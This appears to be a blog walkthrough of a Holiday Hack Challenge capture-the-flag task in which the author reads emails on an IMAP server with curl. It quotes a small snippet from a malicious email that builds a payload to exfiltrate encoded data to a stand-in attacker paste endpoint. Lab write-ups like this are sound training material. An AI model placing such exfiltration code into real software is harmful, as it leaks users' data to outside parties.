Mail Detective

  Challenge Progession:
Act II
Difficulty:
  Location:
City Hall
Curly IMAP Investigation
IMAP With curl?

This is another great Holiday Hack Challenge that lets me use a tool I'm very familiar with in a brand new way. Visit City Hall and speak with Maurice to get more info. Gnomes are sending malicious javascript-enabled emails. All email clients have been shut down in an effort to block these attacks. But how to interact with the email server without an email client? How about curl?

The actual challenge is to locate one of these malicious emails and find the pastebin URL that is being used to exfiltrate data.

Some Research

I had no idea this was even possible. In order to complete this challenge I had to do some research. I found a Github Gist that had plenty of examples on interacting with IMAP servers with curl. After reading through these examples I was ready to get to work.

Apparently if you specify "imap" as the protocol, you can perform many different types of queries against the server. Youc an then use the -X option to specify the query. For example, to list all the folders for a user, perform the query:

curl -v -u user:pass 'imap://server-name:port' -X 'LIST "" "*"'
Don't forget you can always add the "-v" flag to make the commands more verbose for troubleshooting. Armed with this research, I began the challenge.

Reading Emails

The terminal lets us know that the imap server is running on localhost TCP port 143 and the credentials we can use are "dosismail:holidaymagic".

Step one is to list all the folders. To list all the folders issue the command:

dosismail @ Neighborhood Mail ~$ curl -u dosismail:holidaymagic 'imap://localhost:143' -X 'LIST "" "*"'
* LIST (\HasNoChildren) "." Spam
* LIST (\HasNoChildren) "." Sent
* LIST (\HasNoChildren) "." Archives
* LIST (\HasNoChildren) "." Drafts
* LIST (\HasNoChildren) "." INBOX
These are the normal email folders we expect. The next thing we can do is to count how many emails are in each folder. For example, you can list the number of emails in the Spam folder using this command:
dosismail @ Neighborhood Mail ~$ curl -u dosismail:holidaymagic 'imap://localhost:143/' -X 'STATUS Spam (MESSAGES)'
* STATUS Spam (MESSAGES 3)
The Spam folder has 3 emails! I did this with all of the folders and found that the following email counts:
Spam(3)
Sent(0)
Archives(7)
Drafts(2)
INBOX(7)
The most logical thing to do next is to start reading the emails starting with the Spam folder. Maybe I'm being optimistic that the malicious email could marked as spam? Each email has a UID field that can be used in the curl command to read it. For example to read the first email (UID=1) in the Spam folder, issue the command:
curl -u dosismail:holidaymagic "imap://localhost:143/Spam;UID=1"
Finding the Malicious Email

Now to find that malicious email. Reading the first email in the Spam folder shows an email with a ton of javascript in it!

This is definitely malicious javascript. The email presents a fake login page, does some browser fingerprinting, and the saves the data to localstorage. Its also not very quiet about it. It presents an alert box to the user and prints data to the console.

We also learn in this email that the gnomes are working for Frost? Jack Frost is back? Surely not...

Even though we see nefarious activity in this email, there is no data exfiltration going on. Let's check the next email (UID=2).

curl -u dosismail:holidaymagic "imap://localhost:143/Spam;UID=2"
This is another malicious email. There is javascript in here that at least pretends to mine something called "FrostCoin". It also pretends to establish persistence via ServiceWorkers. Finally there is some kind of exfiltration!
// pastebin exfiltration
var pastebinUrl = "https://frostbin.atnas.mail/api/paste";
var exfilPayload = {
	title: "HVAC_Survey_" + Date.now(),
	content: encodedData,
	expiration: "1W",
	private: "1",
	format: "json"
};

There is the URL! The pastebin url is "https://frostbin.atnas.mail/api/paste". Enter this URL in your badge to complete the challenge!

These emails reference the Atnas Corporation, which was the evil corporation from the Gnome in Your Home challenge in 2015, which makes sense seeing as the gnomes are back. However we hear more about this mysterious "Frost" that is the mastermind behind stealing all this refridgeration equipment. More investigation is necessary!

Bonus - More Emails

The emails contain context about what's happening around the neighborhood as well as some entertaining commentary. I will post them here for posterity.

FROM Subject Actions